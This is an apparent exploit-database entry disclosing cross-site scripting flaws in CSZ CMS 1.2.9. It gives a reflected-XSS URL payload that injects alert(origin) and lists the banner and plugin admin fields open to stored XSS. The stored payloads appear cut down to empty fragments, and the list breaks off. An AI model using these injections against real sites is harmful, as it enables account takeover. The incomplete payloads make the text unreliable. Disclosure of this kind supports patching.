# Exploit Title: CSZ CMS 1.2.9 - Multiple Cross-Site Scripting # Date: 2020/12/28 # Exploit Author: SunCSR # Vendor Homepage: https://www.cszcms.com/ # Software Link: https://github.com/cskaza/cszcms # Version: 1.2.9 # Tested on: CSZ CMS 1.2.9 1. Reflected XSS Go to url http://localhost/pluginabc%22%2Dalert%28origin%29%2D%22abc 2. Stored XSS Use an editor account with rights to manage banners, plugins. + Banner Manager: - Add or edit banner: Name field: <p title=""> Note field:

+ Plugin Manager: - Add or edit album(/admin/plugin/gallery): Album Name field: <p title=""> Keyword field:

Short Description field: <p title=""> - Add or edit Category(/admin/plugin/article/): Category Name field: